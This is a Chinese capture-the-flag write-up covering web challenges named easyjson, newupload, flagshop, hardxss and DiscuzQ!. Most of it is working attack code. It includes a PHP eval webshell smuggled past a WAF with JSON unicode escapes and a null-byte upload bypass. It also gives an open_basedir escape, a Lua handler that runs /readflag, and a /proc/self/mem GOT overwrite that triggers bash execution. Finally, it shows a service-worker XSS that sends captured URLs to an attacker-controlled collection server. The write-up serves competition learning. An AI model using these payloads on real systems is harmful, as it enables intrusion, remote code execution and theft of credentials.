前言 一个不会 bin 的 web 真的是随时被人暴打
easyjson web 签到题
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 <?php include 'security.php' ;if (!isset ($_GET['source' ])){ show_source(__FILE__ ); die (); } $sandbox = 'sandbox/' .sha1($_SERVER['HTTP_X_FORWARDED_FOR' ]).'/' ; var_dump($sandbox); if (!file_exists($sandbox)){ mkdir($sandbox); file_put_contents($sandbox."index.php" ,"<?php echo 'Welcome To Dbapp OSS.';?>" ); } $action = $_GET['action' ]; $content = file_get_contents("php://input" ); if ($action == "write" && SecurityCheck('filename' ,$_GET['filename' ]) &&SecurityCheck('content' ,$content)){ $content = json_decode($content); $filename = $_GET['filename' ]; $filecontent = $content->content; $filename = $sandbox.$filename; file_put_contents($filename,$filecontent."\n Powered By Dbapp OSS." ); }elseif ($action == "reset" ){ $files = scandir($sandbox); foreach ($files as $file) { if (!is_dir($file)){ if ($file !== "index.php" ){ unlink($sandbox.$file); } } } } else { die ('Security Check Failed.' ); }
json_decode 会将 \u0000 格式的字符进行 unicode 解码 所以可以利用其 bypass 掉 waf
1 {"c\u006fntent" :"<?ph\u0070 @eval($_POST[x]); ?>" }
newupload 文件上传 带 宝塔 waf 通过在文件内容前增加 %00 bypass 掉 waf
1 2 3 4 5 6 7 8 9 -----------------------------25915315562572954365101207558 Content-Disposition: form-data; name="file" ; filename="1.p h p" Content-Type: image/jpeg %00 <?php phpinfo(); ?> -----------------------------25915315562572954365101207558 --
传个 webshell 但是由于 waf 的存在 会识别 webshell 流量导致无法用蚁剑直接连接 考虑使用编码器进行绕过 蚁剑自带的编码器就是屑
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 'use strict' ;module .exports = (pwd, data, ext={} ) => { data[pwd] = Buffer.from(data['_' ]).toString('base64' ); delete data['_' ]; return data; }
然后就可以连上去了 看下 phpinfo 有 openbase_dir 和 disable_functions 根目录下有 readflag 所以需要 bypass 掉 并执行 /readflag
open_basedir bypass
1 2 3 4 5 chdir("/tmp/btwaf" ); ini_set("open_basedir" , ".." ); chdir(".." );chdir(".." );chdir(".." );chdir(".." );chdir(".." ); ini_set("open_basedir" , "/" ); var_dump(scandir("/" ));
lua bypass 题目 apache 带了 lua 扩展 所以可以上传 lua script
exp.lua
1 2 3 4 5 6 7 8 require "string" function handle (r) r.content_type = "text/plain" local t = io .popen ('/readflag' ) local a = t:read ("*all" ) r:puts(a) end
.htaccess
1 AddHandler lua-script lua
php-fpm bypass unix:///tmp/php-cgi-74.sock cgi 路径 用蚁剑自带的插件即可攻击 但 waf 会把长的 http 包拦了导致 exploit 失败 所以队友改了一下蚁剑的插件把 payload 分段发过去即可
https://github.com/chuochuodragon/as_bypass_php_disable_functions
flagshop 一个裸的文件读 和 一个裸的文件写 flag 不能读
backend.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php $offset = isset ($_GET['offset' ]) ? $_GET['offset' ] : 0 ; $buffer = isset ($_GET['buffer' ]) ? $_GET['buffer' ] : "" ; if (isset ($_GET['writefile' ])) { $fp = fopen($_GET['writefile' ], "a" ); fseek($fp, $offset); fwrite($fp, $buffer); fclose($fp); } if (isset ($_GET['readfile' ])) { echo file_get_contents($_GET['readfile' ]); }
后面就是偏二进制的部分了 /proc/self/maps 可以看到内存 /proc/self/mem 可以修改内存
修改 got 表将 file_get_contetns 函数地址改成 system 参考下面这个脚本
https://github.com/beched/php_disable_functions_bypass/blob/master/procfs_bypass.php
脚本有个地方有问题 需要改的地址为 open@plt 而不是 PIE + open@plt
1 2 3 4 5 6 7 8 9 10 11 得到 PIE base: 0x400000 Offset is 0xe9f998 Libc location: /lib/ x86_64-linux-gnu/libc-2.19 .so libc start: 0x7ffff5f40000 _system offset: 0x46590 open@plt = 0xe9f998 (dec 15333784 ) libc_start + _system offset = 0x7ffff5f86590 (urlencode %90 e%F8%F5%FF%7 F%00 %00 )
1 backend.php?readfile=/bin/bash+-c+"/readflag+>+/tmp/fuck" &writefile=/proc/self /mem&buffer=%90 e%F8%F5%FF%7 F%00 %00 &offset=15333784
hardxss 利用 service worker 对 xss 进行持续化利用 题目有两个域
1 2 3 4 5 xss 点 https: jsonp 点 content-type 为 text/javascript https:
注册 service worker
1 2 3 navigator.serviceWorker.register("https://auth.hardxss.xhlj.wetolink.com/api/loginStatus?callback=importscripts(`evil_server.js`);//" )
通过 iframe 和 document.domain 来进行跨域操作
1 2 3 4 5 6 7 8 9 10 11 12 document .domain = "hardxss.xhlj.wetolink.com" ;var iff = document .createElement("iframe" );iff.src = "https://auth.hardxss.xhlj.wetolink.com/" ; exp = `navigator.serviceWorker.register("https://auth.hardxss.xhlj.wetolink.com/api/loginStatus?callback=importScripts('evil_server.js');//")` ; function iffloader ( ) { iff.contentWindow.eval(exp); } iff.addEventListener("load" , function ( ) { iffloader(); }); document .body.appendChild(iff);
evil service worker
1 2 3 4 5 6 7 8 9 10 self.addEventListener('fetch' , function (event ) { var url = event.request.clone(); var init = {headers :{'Content-Type' :'text/html' }}; var body = '<script>fetch("recive_server?' +btoa(url.url)+'").then(function(res){console.log(res)})</script>' ; if (url.url.startsWith("https://auth.hardxss.xhlj.wetolink.com/api/loginVerify" )){ var res = new Response(body, init); event.respondWith(res.clone()); } })
最后提交给 admin 拿到账号密码登录即可看到 flag 本地测试成功
DiscuzQ! 这题有点离谱 参考出题人博客吧 https://www.zhaoj.in/read-6681.html